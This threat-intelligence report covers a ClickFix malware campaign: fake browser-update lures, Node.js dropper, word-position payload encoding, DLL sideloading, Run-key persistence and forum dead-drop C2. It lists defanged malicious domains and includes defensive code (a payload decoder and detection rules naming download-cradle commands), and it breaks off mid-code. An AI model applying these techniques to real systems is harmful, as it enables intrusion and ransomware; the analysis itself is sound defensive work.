Lorem Ipsum Revisited

A ClickFix Pivot & Its Rapid Brigantine Lineage

June 16, 2026 | 21 min read

Thomas Elkins and Joshua Green

What Happened?

BlueVoyant Security Operations Center (SOC) and Threat Fusion Cell (TFC) researchers have been tracking an active ClickFix campaign that manipulates users into believing their web browser requires a security update. If the user complies, the ClickFix lure initiates a multi-stage infection chain that ultimately deploys the Lorem Ipsum Loader, a malware family BlueVoyant first documented in May 2026. The current campaign represents a notable evolution from the previous Lorem Ipsum operation, which distributed trojanized Microsoft Teams installers through SEO-poisoned and malvertised fake download portals. The pivot to ClickFix lures hosted on compromised WordPress (WP) sites significantly broadens the potential victim pool and demonstrates the operators' willingness to rapidly adapt their initial access techniques. 

BlueVoyant assesses with high confidence that this delivery pivot was reactive rather than strategic — driven directly by Microsoft's 19 May 2026 Digital Crimes Unit disruption of Forging Marauder (a.k.a. Fox Tempest), a malware-signing-as-a-service (MSaaS) provider that had supplied the operators with fraudulently signed Microsoft Trusted Signing certificates since at least June 2025. The loss of certificate supply rendered the previous signed-installer delivery model unviable, forcing the operators to adopt a delivery mechanism that eliminates code signing entirely. 

Despite the change in delivery, the underlying Lorem Ipsum tooling demonstrates strong continuity with the previous campaign — including the signature substitution-cipher payload reconstruction routine now implemented across PowerShell, JavaScript, and native code; dual DLL sideloading vectors; the preserved -=( and )=- dead-drop delimiter convention; and the per-victim UUID-tracked command-and-control (C2) architecture. The dead-drop resolver platform has migrated from letsdiskuss[.]com to digitalpoint[.]com following BlueVoyant's prior public disclosure, with a corresponding rotation of the C2 cluster. 

BlueVoyant assesses with high confidence that the Lorem Ipsum ecosystem is operationally linked to Rapid Brigantine (a.k.a. Vanilla Tempest) activity and likely supports Rapid Brigantine intrusion operations, based on delivery-model overlap, tooling lineage, infrastructure patterns, and publicly reported post-exploitation tradecraft. Rapid Brigantine is a financially motivated threat group active since at least mid-2022 known for deploying ransomware families including Rhysida, BlackCat, Zeppelin, and Quantum Locker. Lorem Ipsum appears to be a parallel or successor loader within Rapid Brigantine's expanding toolkit, culminating in handoff to their documented post-exploitation arsenal (Supper, Oyster, MeowBackConn) and ultimately to Rhysida ransomware deployment. 

Key Findings

  • Delivery pivot driven by Microsoft's disruption of Forging Marauder. The late-May 2026 shift from signed Microsoft Teams MSI installers to ClickFix browser update lures coincides directly with Microsoft DCU's 19 May 2026 takedown of Forging Marauder's MSaaS infrastructure, which eliminated Rapid Brigantine's certificate supply. 
  • High-confidence attribution to Rapid Brigantine. Three independent attributions of the trojanized Teams installer delivery model to Rapid Brigantine, shared post-exploitation tooling, and operational tradecraft alignment support the upgraded confidence level. 
  • Tooling lineage spans three runtime environments. The signature substitution-cipher reconstruction routine appears across PowerShell (previous campaign), JavaScript (current Update.js dropper), and native code (current mscoree.dll) — a tradecraft fingerprint highly unlikely to be coincidentally replicated. 
  • Multi-stage chain abuses portable Node.js runtime. The infection chain downloads a legitimate, signed Node.js v7.10.1 binary from the official distribution site to execute the JavaScript dropper — a living-off-the-land technique absent from prior Lorem Ipsum samples. 
  • Custom word-position encoding conceals embedded payloads. Update.js uses a text-based substitution scheme encoding binary content as ordered sequences of innocuous-looking words, reconstructing executables at runtime in a manner that complicates static analysis. 
  • Dual DLL sideloading vectors deployed in parallel. The operators maintain both mscoree.dll and msvcp140.dll sideloading pairs in the current sample corpus, providing redundancy across detection signatures. 
  • Dead-drop resolver migrated from LetsDiskuss to DigitalPoint. The operators retained the -=( and )=- delimiter convention, substitution-cipher decoding logic, and one-profile-to-one-C2-cluster operational mapping despite the platform migration. 
  • C2 infrastructure fronted behind Cloudflare with per-victim redundancy. Each infection beacons to three redundant Cloudflare-fronted C2 domains using the same per-victim UUID, complicating takedown and rendering IP-based blocking ineffective. 

Initial Access via Compromised WP Sites 

The attack begins when a user visits a website compromised by the threat group. The website displays an iframe presenting the user with a fake pop-up indicating that their browser is out of date. The iframe includes instructions on how to remediate: simply open Windows Terminal (wt.exe) and paste a command into it.

[Figure: Fake browser update notification]

After interacting with the compromised site, BlueVoyant researchers observed the iframe contained the following code:

[Figure: ClickFix command]

The PowerShell command illustrated above masquerades as a legitimate Microsoft Edge security intelligence update while performing a series of actions unrelated to updating Microsoft Edge. The script begins by displaying a reassuring status message to the user before downloading a ZIP archive named Update.zip from hxxps://autoupdatet[.]com/get_update?i=75975, saving the file to the C:\ProgramData directory. It then downloads a portable copy of Node.js v7.10.1 from the official Node.js distribution site, storing the archive locally as msedge.zip.  

The choice of Node.js v7.10.1 — a version released in 2017 and long deprecated — is itself analytically notable. The operators' deliberate selection of an outdated runtime likely reflects its smaller binary footprint, reduced runtime overhead, absence of modern JavaScript security hardening features that could complicate execution of the dropper script, and the operational reality that the legitimate Node.js distribution site continues to host historical versions, providing a stable and trusted download URL that has not changed since the version's original release. By leveraging a legitimate and widely used runtime, the threat actor can execute JavaScript-based payloads without relying on a traditional standalone executable. 

After both archives have been downloaded, the script extracts their contents into C:\ProgramData. Once unpacked, it launches node.exe from the extracted Node.js archive and supplies Update.js, delivered within the downloaded payload archive, as an argument. This causes the attacker-provided JavaScript to execute using the Node.js runtime. The process is started with a hidden window, reducing the likelihood that the user will notice the activity occurring in the background.

The script also launches a second hidden PowerShell process with the execution policy set to Bypass, allowing the embedded commands to run without being restricted by local PowerShell execution policy settings. These techniques help minimize visible indicators of execution while facilitating the delivery and execution of the next-stage payload. BlueVoyant additionally observed the PowerShell loader incorporating anti-debug and sandbox detection logic, consistent with the operators' broader anti-analysis posture documented in prior campaigns. 

Upon completion, the script displays the message: "Done! msedge security intelligence version 1.449.542.0 (2026) successfully installed." This message is simply text written to the console and does not indicate that a genuine Microsoft Edge update has occurred. Instead, it serves as a form of social engineering designed to convince the user that a legitimate security update was successfully installed, while the downloaded JavaScript payload continues executing in the background. 

BlueVoyant observed autoupdatet[.]com operating alongside a rotating pool of at least 11 themed update domains, all serving payloads through identical /get_update?i=<numeric_id> URL templates. Analysis of compromised WordPress sites hosting the ClickFix iframe — spanning industries from architecture and legal services to non-profits, construction technology, and content publishing — confirms autoupdatet[.]com, autoupdaters[.]com, and autoupdatethis[.]com as the currently active production cluster, consistent with opportunistic mass compromise of vulnerable WordPress installations rather than targeted site selection. 

Node.js-Executed JavaScript Dropper

Initial analysis of the downloaded Update.js file led BlueVoyant researchers to assess that the script functions as a dropper/loader designed to deploy and execute additional malware components. This assessment was based on several immediately observable characteristics, including variables referencing executable, DLL, and batch file payloads, functions responsible for writing files to disk, and logic used to launch newly created processes. Executed through the Node.js runtime previously downloaded by the PowerShell script, Update.js imports several Node.js modules, including fs, path, crypto, and child_process, providing capabilities for file system interaction, cryptographic hashing, and process execution. Subsequent analysis confirmed that the script reconstructs payloads from embedded encoded data, writes them to disk, and executes them on the victim system.

[Figure: Contents of Update.js]

The script defines a target directory within C:\ProgramData\ using the folder name ".NET Runtime Optimization Service c8w2i9KUtgpF", which closely resembles the naming convention of legitimate Windows and .NET components. This naming scheme appears intended to help the malware blend into the operating system and avoid drawing attention during casual inspection. 

One of the more notable features of the script is its use of a custom text-based encoding scheme to conceal the embedded payloads. Rather than storing executable content directly within the JavaScript source, the malware contains several large strings comprised of seemingly random words and numbers such as "gentle", "silver", "unfurl", "stitches", and other recurring terms. At first glance, these strings resemble meaningless text; however, they actually serve as encoded representations of binary data. BlueVoyant researchers identified that this payload reconstruction technique resembles the binary reconstruction process previously documented in BlueVoyant research on the Lorem Ipsum Loader, where encoded text-based data was similarly decoded and reconstructed into executable payloads at runtime.

The script maintains a predefined word list and uses the function writePositionsToFile() to convert words from the encoded strings into byte values. For each word encountered, the function determines its position within the master word list and uses that position as the corresponding byte value. The resulting values are assembled into a buffer and written directly to disk. In effect, the malware reconstructs executable files from word positions rather than storing the binaries in their original form. This technique allows the malicious payloads to remain hidden within apparently harmless text, making static analysis and signature-based detection significantly more difficult. 

To support this process, the script implements several helper functions for logging activity, calculating SHA-256 hashes, writing files to disk, and launching processes. The logging and hashing functionality also provides basic verification that the reconstructed files were written successfully. The Update.js dropper additionally implements deliberate long-sleep intervals during execution — a sandbox-evasion technique designed to outlast short-duration automated analysis sessions before reconstructing and executing its payloads. 
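The decoding step described above is simple enough to reimplement for triage. The following is an added analyst example, not code from Update.js: it maps each word to its position in a master word list, rebuilds the bytes, and applies the same SHA-256 check the dropper uses to confirm the file was written. The dropper's real word list is not reproduced; the 256-entry list here is constructed from two small tables so that every byte value has exactly one word, and the encoded sample string is generated from that list rather than taken from a sample.

```python
"""Decoder for the word-position payload encoding described for Update.js.

Added analyst example, not code from Update.js. The 256-entry word list is
constructed for this demo (the dropper carries its own list); the encoded
sample string is generated from it.
"""
import hashlib

# Constructed word list: a word's index in the list is the byte it encodes.
_PREFIXES = ["gentle", "silver", "unfurl", "stitch", "amber", "breeze",
             "cobble", "drift", "ember", "fable", "glimmer", "hollow",
             "ivory", "jasper", "kettle", "lantern"]
_SUFFIXES = ["", "s", "ed", "ing", "er", "est", "ly", "ful",
             "less", "ness", "ish", "y", "en", "ment", "hood", "ward"]
WORD_LIST = [p + s for p in _PREFIXES for s in _SUFFIXES]   # 16 x 16 = 256 words
WORD_TO_BYTE = {word: index for index, word in enumerate(WORD_LIST)}


def unknown_words(encoded: str) -> list:
    """Tokens absent from the word list. A non-empty result means the text was
    encoded against a different list (a new sample) or is not encoded at all."""
    return sorted({t for t in encoded.split() if t not in WORD_TO_BYTE})


def decode_words(encoded: str) -> bytes:
    """Rebuild the binary: each word becomes the byte equal to its list position."""
    missing = unknown_words(encoded)
    if missing:
        raise ValueError(f"words not in list: {missing[:5]}")
    return bytes(WORD_TO_BYTE[t] for t in encoded.split())


def sha256_hex(data: bytes) -> str:
    """The same kind of check the dropper performs on the files it writes."""
    return hashlib.sha256(data).hexdigest()


def looks_like_pe(data: bytes) -> bool:
    """Quick triage: a reconstructed EXE or DLL should start with the MZ header."""
    return data[:2] == b"MZ"


def reconstruct(encoded: str, expected_sha256: str = None):
    """Decode and hash in memory (no disk write).
    Returns (bytes, sha256_hex, hash_matches) where hash_matches is None
    when no expected digest was supplied."""
    data = decode_words(encoded)
    digest = sha256_hex(data)
    matches = None if expected_sha256 is None else digest == expected_sha256
    return data, digest, matches


# Constructed sample input: the first bytes of a PE-like blob, encoded as words.
SAMPLE_PAYLOAD = b"MZ\x90\x00demo"
SAMPLE_ENCODED = " ".join(WORD_LIST[b] for b in SAMPLE_PAYLOAD)

if __name__ == "__main__":
    print(SAMPLE_ENCODED)                      # amberment breezeish fable gentle ...
    data, digest, ok = reconstruct(SAMPLE_ENCODED, sha256_hex(SAMPLE_PAYLOAD))
    print(data, digest, ok, looks_like_pe(data))
```

Against a real sample, replace WORD_LIST with the list recovered from the script and feed it the embedded strings; unknown_words() is the first thing to run, because a variant that rotates its word list will otherwise decode to garbage that still passes a length check.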

After creating the destination directory, the script decodes and reconstructs three files: 

  • NET Runtime Optimization Service.exe 
  • mscoree.dll 
  • c8w2i9KUtgpF.bat 

Each file is written to the newly created directory under C:\ProgramData\. The script then verifies that all expected files exist before proceeding with execution. 

[Figure: Code responsible for reconstructing the dropped files]

Once reconstruction is complete, the script launches the batch file c8w2i9KUtgpF.bat, passing the newly created executable as an argument. It subsequently attempts to execute NET Runtime Optimization Service.exe directly. Throughout execution, the script records status messages indicating successful file creation and launch attempts while generating warnings or errors if files are missing or execution fails.

Overall, Update.js serves as a second-stage payload responsible for decoding, dropping, and executing additional malware components. Rather than embedding executable files directly within the script, the threat actor conceals them using a custom word-position encoding mechanism and reconstructs them only at runtime — an approach that reduces the visibility of the malicious binaries, complicates manual analysis, and hinders security products relying on static file signatures.

Interestingly, while JavaScript-based Update.js is the dominant dropper variant observed in the current ClickFix campaign, BlueVoyant also identified VBS-based variants producing an identical downstream payload set, indicating the operators maintain multiple dropper implementations to accommodate different delivery vectors while keeping the underlying Lorem Ipsum chain consistent.

Registry-Based Persistence

Analysis of the reconstructed c8w2i9KUtgpF.bat file reveals that its primary purpose is to establish persistence for the dropped payload. The script begins by validating that a file path has been supplied as a command-line argument and confirms that the specified file exists on disk. If either condition is not met, the script displays an error message and terminates.

[Figure 5: Contents of the batch file]

Once the supplied file path has been validated, the batch script creates a new registry value within HKCU\Software\Microsoft\Windows\CurrentVersion\Run, a commonly abused Windows autorun location that causes programs to execute automatically when a user logs in. The registry value is named "NET Runtime Optimization Service 50Fs4tMIDVSm", a name that closely resembles legitimate .NET Framework components and may be intended to blend in with normal operating system entries.

The registry value's data is set to the path of the executable supplied as an argument to the batch file, which in this case corresponds to the previously reconstructed NET Runtime Optimization Service.exe payload. As a result, the executable will automatically launch each time the affected user signs into Windows, providing the malware with persistence across system reboots and user logoff events.

Upon successfully creating the registry entry, the script displays a confirmation message indicating that the file was added to startup. If the registry modification fails, an error message is displayed instead. Overall, the batch file serves as a persistence mechanism, ensuring that the dropped malware payload is automatically executed whenever the user logs into the system.

DLL-Sideloading & Lorem Ipsum Buildout

BlueVoyant researchers determined that NET Runtime Optimization Service.exe is a renamed version of the legitimate Microsoft .NET ClickOnce Launch Utility. The executable's primary purpose is to sideload the accompanying mscoree.dll file, which contains the threat actor's malicious code. While mscoree.dll is the name of a legitimate Windows component, the threat actors created a malicious DLL of the same name to exploit DLL sideloading via the renamed ClickOnce Launch Utility. When NET Runtime Optimization Service.exe loads the malicious DLL at runtime, the embedded code is executed under the context of a trusted Microsoft binary.

BlueVoyant observed the operators using both mscoree.dll and msvcp140.dll as sideloading vectors across the current sample corpus. The msvcp140.dll vector matches the sideloading approach documented in BlueVoyant's previous research on the Teams installer campaign, where a fake msvcp140.dll was paired with a renamed legitimate executable to execute the Lorem Ipsum Loader. The continued use of msvcp140.dll alongside the additional mscoree.dll variant reflects the operators' practice of maintaining multiple sideloading pairs in parallel, providing redundancy across detection signatures and consistent capability across multiple delivery iterations.

Analysis of the malicious mscoree.dll revealed functionality responsible for decoding an embedded payload using a routine nearly identical to the reconstruction mechanism previously observed within Update.js. The embedded payload was determined to be the previously documented Lorem Ipsum Loader.

The Lorem Ipsum Loader is designed to retrieve the next-stage Lorem Ipsum Backdoor from C2 infrastructure obtained from attacker-controlled profiles hosted on social networking platforms. In earlier campaigns documented by BlueVoyant, the threat actors utilized the social networking site letsdiskuss[.]com, creating multiple accounts whose profile descriptions contained encoded C2 information. The encoded data was embedded between the delimiters "-=(" and ")=-" and decoded by the malware at runtime using a custom reconstruction routine.

More recently, BlueVoyant observed the threat actors migrate away from abusing letsdiskuss[.]com and adopt the forum digitalpoint[.]com for the same purpose. Similar to the previous infrastructure, attacker-controlled DigitalPoint profiles contain encoded C2 information embedded within publicly accessible profile content and enclosed between the same "-=(" and ")=-" delimiters. The continued use of this technique suggests the threat actors have retained their existing infrastructure retrieval methodology while simply changing the hosting platform.

[Figure 6: DigitalPoint profile containing encoded C2 information]

Interestingly, one of the DigitalPoint accounts used by the threat actors was named "TryToDetectMe", potentially serving as a lighthearted challenge to security researchers analyzing the campaign. Like LetsDiskuss, DigitalPoint is a legitimate online community frequented by webmasters, marketers, SEO professionals, and freelancers. By hiding C2 information within user-generated content on otherwise benign platforms, the threat actors can blend their infrastructure into normal web traffic and reduce the likelihood of attracting immediate attention.
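Because the delimiter convention survived the platform migration, it is a usable hunting hook on its own. The following is an added example, not the loader's code: it locates every well-formed "-=( ... )=-" span in scraped profile content and handles the cases a naive regex gets wrong (several spans on one page, an opener with no closer, a stray opener inside a span). The substitution-cipher decoding of the span contents is the operator's routine and is not reproduced here; the profile pages below are constructed.

```python
"""Locate dead-drop segments delimited by -=( and )=- in profile content.

Added hunting example, not the loader's own code. The decoding of the
extracted span is not reproduced; this only finds and validates the spans.
"""
OPEN, CLOSE = "-=(", ")=-"


def extract_dead_drops(text: str) -> list:
    """Return (offset, payload) for each well-formed span in the text.

    Edge cases: several spans per page; an opener with no closer is ignored
    rather than swallowing the rest of the page; a stray opener inside a span
    means the innermost opener wins; empty spans are dropped."""
    found, pos = [], 0
    while True:
        start = text.find(OPEN, pos)
        if start < 0:
            break
        end = text.find(CLOSE, start + len(OPEN))
        if end < 0:
            break                      # unterminated opener: nothing to extract
        inner = text[start + len(OPEN):end]
        stray = inner.rfind(OPEN)
        if stray >= 0:                 # keep only the innermost opener's content
            start += stray + len(OPEN)
            inner = inner[stray + len(OPEN):]
        payload = inner.strip()
        if payload:
            found.append((start, payload))
        pos = end + len(CLOSE)
    return found


def scan_profiles(pages: dict) -> dict:
    """Map profile URL -> list of extracted payloads, keeping only pages with hits."""
    result = {}
    for url, html in pages.items():
        payloads = [p for _, p in extract_dead_drops(html)]
        if payloads:
            result[url] = payloads
    return result


# Constructed profile pages (not real DigitalPoint content; hosts are placeholders).
SAMPLE_PAGES = {
    "https://forum.example.invalid/members/trytodetectme": (
        "<p>Freelance SEO, open for work.</p>\n"
        "<p>-=( CONSTRUCTED-BLOB-ONE )=- cheers -=(CONSTRUCTED-BLOB-TWO)=-</p>\n"
        "<p>-=( unterminated opener at the end of the page</p>"),
    "https://forum.example.invalid/members/ordinary_user": "<p>Hello from Ohio -=( )=-</p>",
}

if __name__ == "__main__":
    for url, payloads in scan_profiles(SAMPLE_PAGES).items():
        print(url, payloads)
```

The offset returned alongside each payload lets an analyst show reviewers exactly where in the profile the span sits, which matters when a platform's own markup happens to contain one of the delimiter characters.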

All Signs Point to Rapid Brigantine

The current ClickFix campaign represents the most significant operational change observed since BlueVoyant began tracking the Lorem Ipsum ecosystem in February 2026. The previous campaign relied on resource-intensive infrastructure — SEO-poisoned and malvertised download portals, short-validity Microsoft Trusted Signing certificates, and continuously rotated NameCheap-registered MSI delivery domains. The pivot to ClickFix in late May 2026 eliminates the code-signing requirement entirely, substituting the legitimacy of a validly signed installer with a different form of legitimacy: a user voluntarily executing the malicious command in their own terminal. While the ClickFix model broadens the victim pool from users searching specifically for Microsoft Teams to anyone browsing a compromised website, BlueVoyant assesses with high confidence that this pivot was reactive rather than strategic — likely accelerated by Microsoft's May 19th Digital Crimes Unit disruption of Forging Marauder (a.k.a. Fox Tempest), the malware-signing-as-a-service (MSaaS) provider that had been supplying the operators with fraudulently signed certificates since at least June 2025. The introduction of a portable Node.js runtime in the new delivery chain adds a living-off-the-land execution layer absent from prior samples.

While delivery has changed substantially, the underlying tooling reveals strong continuity with the previous campaign BlueVoyant documented. The signature substitution-cipher reconstruction routine — implemented across PowerShell (previous campaign), JavaScript (current Update.js dropper), and native code (current mscoree.dll) — is a tradecraft fingerprint unlikely to be coincidentally replicated. The DLL sideloading mechanism has expanded from msvcp140.dll to include both msvcp140.dll and mscoree.dll in parallel, but the architectural pattern is preserved: a benign-named DLL containing encoded ciphertext, decoded via the operator's signature reconstruction routine into the Lorem Ipsum Loader. The -=( and )=- delimiter convention, the per-victim UUID-tracked C2 architecture, and the dead-drop resolver methodology have all been retained — with the dead-drop platform itself migrating from LetsDiskuss to DigitalPoint following BlueVoyant's prior public disclosure of the LetsDiskuss profiles. BlueVoyant assesses with high confidence that both campaigns share authorship and operator continuity.

BlueVoyant's previous research did not attribute the Lorem Ipsum ecosystem to any named threat group, citing insufficient evidence and assessing the operators as a "rapidly maturing mid-tier criminal threat actor" potentially functioning as an initial access broker. The current research, combined with open-source reporting from Microsoft Threat Intelligence, the DFIR Report, Huntress, and Socura, supports a meaningful update to that assessment. BlueVoyant now assesses with high confidence that the Lorem Ipsum ecosystem is operated by Rapid Brigantine (a.k.a. Vanilla Tempest, DEV-0832, VICE SPIDER, and Vice Society), a financially motivated threat group active since at least mid-2022 known for deploying ransomware families including Rhysida, BlackCat, Zeppelin, and Quantum Locker.

The most consequential supporting evidence comes from two Microsoft Threat Intelligence disclosures bracketing the Lorem Ipsum campaign timeline. In October 2025, MSTIC publicly attributed and disrupted a Rapid Brigantine campaign distributing fake MSTeamsSetup.exe files hosted on Teams-themed malicious domains (e.g., teams-download[.]buzz), driven by SEO poisoning and malvertising, signed with fraudulently obtained Microsoft Trusted Signing certificates, and delivering the Oyster backdoor as a stepping stone to Rhysida ransomware deployment. BlueVoyant's previous research characterized the trojanized Teams installer delivery as SEO poisoning; MSTIC's subsequent reporting indicates malvertising via legitimately purchased advertisements played a significant role alongside SEO poisoning, with the two techniques likely used in combination. Nevertheless, Microsoft disrupted that operation by revoking over 200 fraudulently obtained certificates. In May 2026, MSTIC and Microsoft's Digital Crimes Unit subsequently disrupted Forging Marauder (a.k.a. Fox Tempest), a financially motivated threat actor operating an MSaaS offering via signspace[.]cloud that abused Microsoft Artifact Signing to generate short-lived (72-hour) certificates issued under stolen US/Canadian identities — a precise structural match for the certificate procurement pipeline BlueVoyant documented in the February 2026 Lorem Ipsum campaign and previously attributed to a "systematic certificate procurement pipeline."

MSTIC's May 2026 reporting confirms Rapid Brigantine was a Forging Marauder customer since at least June 2025, and provides a case study walking through the Rapid Brigantine attack chain — uploading trojanized Microsoft Teams installers to Fox Tempest's signing infrastructure, distributing them via malvertising and fraudulent download pages, and delivering Oyster as the post-installation payload. This delivery model is a precise structural match to the Lorem Ipsum operation BlueVoyant began tracking in February 2026, and the timing of Microsoft's two disruption events provides clean causal explanations for the operators' subsequent pivots: the October 2025 certificate revocation drove the renewed certificate procurement that produced the Lorem Ipsum-era certificate pattern, and the May 2026 Forging Marauder disruption eliminated the operators' certificate supply entirely, driving the late-May pivot to a ClickFix delivery model that requires no code signing. Based on the technical characteristics documented in BlueVoyant's prior Lorem Ipsum research — the substitution-cipher decoding routine, dead-drop C2 resolution, and JFIF-encapsulated traffic — Lorem Ipsum Loader exhibits behaviors distinct from those publicly documented for the Oyster malware. BlueVoyant assesses that Lorem Ipsum Loader is most likely a parallel or successor loader within Rapid Brigantine's toolkit rather than the same family Microsoft tracks as Oyster, consistent with Rapid Brigantine's documented pattern of operating a diverse, role-specialized arsenal across multiple loaders and backdoors.

Further supporting evidence comes from the DFIR Report's publicly documented April 2026 intrusion, in which a trojanized Microsoft Teams MSI installer (MTSetup_v15.3.7191.msi) initiated a multi-stage infection chain that BlueVoyant separately identified as deploying the Lorem Ipsum Loader. The PowerShell loader executed by the MSI used a command structure that was a precise match for the Lorem Ipsum tradecraft signature in which the AES key and initialization vector are externalized as MSI custom action arguments rather than embedded in the loader. That same intrusion ultimately deployed MeowBackConn, a native DLL backdoor (netdrv.dll) executed via rundll32 with the export Meow and persisted on domain controllers through a SYSTEM-context scheduled task running every 720 minutes. MeowBackConn has been independently associated with Rapid Brigantine by the DFIR Report and others, having been previously observed in the group's Gootloader-delivered intrusions in November 2025 alongside the Supper SOCKS5 backdoor and the Oyster malware family. The intrusion additionally featured an intermediate DLL (askndfao.dll) communicating to 51.222.96[.]58:1080 — the port-1080 traffic pattern consistent with SOCKS proxy functionality and the randomized naming convention matching both Lorem Ipsum's documented file-naming patterns and Rapid Brigantine's Supper backdoor naming conventions.

This evidence produces a coherent multi-campaign timeline in which every major operational pivot has a clear external driver: 

  • June–October 2025: Rapid Brigantine distributes fake Microsoft Teams installers signed via Forging Marauder's MSaaS, delivering the Oyster backdoor and Rhysida ransomware (per MSTIC).
  • October 2025: Microsoft revokes over 200 fraudulently obtained Forging Marauder-issued certificates attributed to Rapid Brigantine, disrupting the signed-installer pipeline.
  • February–April 2026: BlueVoyant first documents the Lorem Ipsum ecosystem — a new loader family deployed via the same fake-Teams-installer model, supported by renewed Forging Marauder-issued certificates exhibiting the 72-hour validity and stolen-identity pattern characteristic of the MSaaS.
  • April 2026: The DFIR Report publicly documents a trojanized Teams MSI intrusion deploying both Lorem Ipsum Loader and MeowBackConn on domain controllers, providing the clearest co-deployment evidence linking Lorem Ipsum to Rapid Brigantine's documented post-exploitation arsenal.
  • May 19, 2026: Microsoft's Digital Crimes Unit disrupts Forging Marauder's MSaaS infrastructure, revoking over 1,000 certificates and taking down signspace[.]cloud — eliminating Rapid Brigantine's certificate supply.
  • Late May–June 2026: Lorem Ipsum operators pivot to ClickFix delivery, eliminating the code-signing requirement entirely (the focus of this research).

Several operational tradecraft patterns observed in the current campaign reinforce this attribution. The ClickFix iframe lure is hosted across at least five compromised WordPress sites spanning architecture, legal services, non-profit, construction technology, and content publishing industries — mirroring the Lure Marauder (a.k.a. Storm-0494, UNC2565) to Rapid Brigantine handoff pattern documented by Huntress and Socura, in which compromised WordPress infrastructure serves as the delivery layer for Gootloader infections. While the Lorem Ipsum and Gootloader chains are technically distinct, the shared reliance on compromised WordPress infrastructure suggests either common access broker sources, shared compromise tooling, or operator-level coordination between the two pipelines. The active Lorem Ipsum C2 cluster (openanyworddocument[.]com, kittyfreespace[.]com, searchdocumentsfree[.]com) is hosted with Cloudflare, complicating takedown and rendering IP-based blocking ineffective — operationally consistent with mature criminal infrastructure practices. The per-victim UUID architecture, in which each infection beacons to three redundant C2 domains with separate UUID spaces for /api/init/ and the newly observed /api/cl/ endpoint, is conceptually similar to MeowBackConn's documented backup C2 configuration mechanism, reflecting a shared operator philosophy around victim tracking and infrastructure resilience. Finally, the "TryToDetectMe" DigitalPoint profile observed in the current campaign is consistent with operator personalities that engage in lighthearted antagonism toward defenders — a behavioral pattern more commonly observed in named, sustained-operation threat groups than in commodity-level access brokers.

Rather than functioning as an independent initial access broker, the Lorem Ipsum operation appears to be part of Rapid Brigantine's expanding initial access toolkit, operating alongside their Oyster malware pipeline and their Gootloader partnership with Lure Marauder. Rapid Brigantine operates within a broader criminal services ecosystem that included Forging Marauder's MSaaS (used from at least June 2025 until Microsoft's May 2026 disruption), Lure Marauder's Gootloader initial access service, and direct development or partnership relationships with multiple loader and backdoor families including Lorem Ipsum, Oyster, Supper, and MeowBackConn. The Lorem Ipsum chain culminates in handoff to Rapid Brigantine's established post-exploitation tooling and ultimately to their documented ransomware deployments, primarily Rhysida. Whether the Lorem Ipsum operators are Rapid Brigantine personnel directly or a closely allied development team providing tooling into Rapid Brigantine's operational pipeline remains an open intelligence gap, but is not required to support the current assessment.

Conclusion

Defending against this ClickFix campaign and the broader Rapid Brigantine post-exploitation activity that typically follows requires prioritizing behavioral detections over static indicators, given the operators' demonstrated capacity for rapid pivot in response to disruption. The most operationally valuable controls focus on the consistent behaviors that span Rapid Brigantine's multiple delivery pipelines: restricting script interpreters from executing out of user-writable directories via AppLocker or Windows Defender Application Control; alerting on anomalous parent-child process relationships, including wt.exe spawning PowerShell with download cradles or portable Node.js executing from C:\ProgramData\; and enabling PowerShell Script Block Logging (Event ID 4104) to capture deobfuscated payload content that is otherwise opaque to static analysis.

Lorem Ipsum-specific detection priorities include monitoring for HKCU Run-key persistence under .NET Runtime Optimization Service-themed naming, alerting on DLL sideloading from non-standard paths, and treating any outbound traffic to letsdiskuss[.]com, digitalpoint[.]com, or the active C2 cluster (openanyworddocument[.]com, kittyfreespace[.]com, searchdocumentsfree[.]com) from non-browser processes as high-priority alerts. Given Rapid Brigantine's documented one-to-seventeen-hour window from initial access to domain controller compromise, defenders should treat any confirmed Lorem Ipsum indicator as an active incident warranting immediate containment and elevated-tempo response rather than routine alert triage.
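The behavioral priorities listed in this conclusion translate directly into rules. The following is an added example, not BlueVoyant's or any vendor's detection content: it evaluates a handful of rules over constructed, Sysmon-style process, image-load, registry and network events (field names are simplified) covering the wt.exe to PowerShell cradle, portable Node.js in C:\ProgramData\, the .NET-themed Run key, mscoree.dll/msvcp140.dll loading from outside C:\Windows\, and non-browser traffic to the dead-drop and C2 domains or to a /api/init/ or /api/cl/ UUID path. The watchlist is the report's indicator set; the sample events, including file paths and the Node.js folder name, are constructed.

```python
"""Behavioural detections for the ClickFix -> portable Node.js -> sideload chain.

Added example, not BlueVoyant's detection content. Events are constructed,
Sysmon-style dicts with simplified field names; tune against real telemetry.
"""
import re
from pathlib import PureWindowsPath

WATCHLIST = {"letsdiskuss.com", "digitalpoint.com", "autoupdatet.com",
             "autoupdaters.com", "autoupdatethis.com", "openanyworddocument.com",
             "kittyfreespace.com", "searchdocumentsfree.com"}   # from the report's IoCs
BROWSERS = {"msedge.exe", "chrome.exe", "firefox.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
CRADLE_TOKENS = ("invoke-webrequest", "iwr ", "downloadfile", "downloadstring",
                 "start-bitstransfer", "expand-archive")
SIDELOAD_NAMES = {"mscoree.dll", "msvcp140.dll"}
RUN_KEY = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run$", re.I)
DOTNET_THEME = re.compile(r"net runtime optimization service", re.I)
UUID_BEACON = re.compile(r"^/api/(init|cl)/[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}$", re.I)


def _name(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def _under(path: str, root: str) -> bool:
    return path.lower().startswith(root.lower())


def evaluate(ev: dict) -> list:
    """Return the names of every rule the event matches (empty list = no hit)."""
    hits = []
    if ev["type"] == "process":
        image, parent = _name(ev["image"]), _name(ev.get("parent_image", ""))
        cmd = ev.get("cmdline", "").lower()
        # Windows Terminal spawning PowerShell that fetches content: the pasted ClickFix command
        if parent == "wt.exe" and image in SHELLS and any(t in cmd for t in CRADLE_TOKENS):
            hits.append("clickfix_terminal_download_cradle")
        # portable Node.js runtime executing from ProgramData
        if image == "node.exe" and _under(ev["image"], "C:\\ProgramData\\"):
            hits.append("portable_node_in_programdata")
        # hidden window plus Bypass policy: how the second-stage shell is launched
        if image in SHELLS and "-executionpolicy bypass" in cmd and "-windowstyle hidden" in cmd:
            hits.append("hidden_bypass_powershell")
    elif ev["type"] == "imageload":
        # a DLL named like a system component loading from outside C:\Windows
        if _name(ev["loaded"]) in SIDELOAD_NAMES and not _under(ev["loaded"], "C:\\Windows\\"):
            hits.append("sideload_dll_outside_system_path")
    elif ev["type"] == "registry":
        if RUN_KEY.search(ev["key"]) and DOTNET_THEME.search(ev.get("value_name", "")):
            hits.append("dotnet_themed_run_key")
    elif ev["type"] == "network":
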